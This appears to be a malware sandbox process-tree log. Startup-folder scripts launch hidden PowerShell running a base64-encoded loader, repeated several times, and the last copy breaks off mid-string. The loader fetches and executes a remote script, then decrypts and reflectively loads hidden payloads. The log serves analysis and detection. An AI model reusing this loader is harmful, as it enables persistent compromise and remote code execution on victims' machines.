    • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3688 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6840 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5960 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3960 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4780 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6956 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1004 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6188 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpL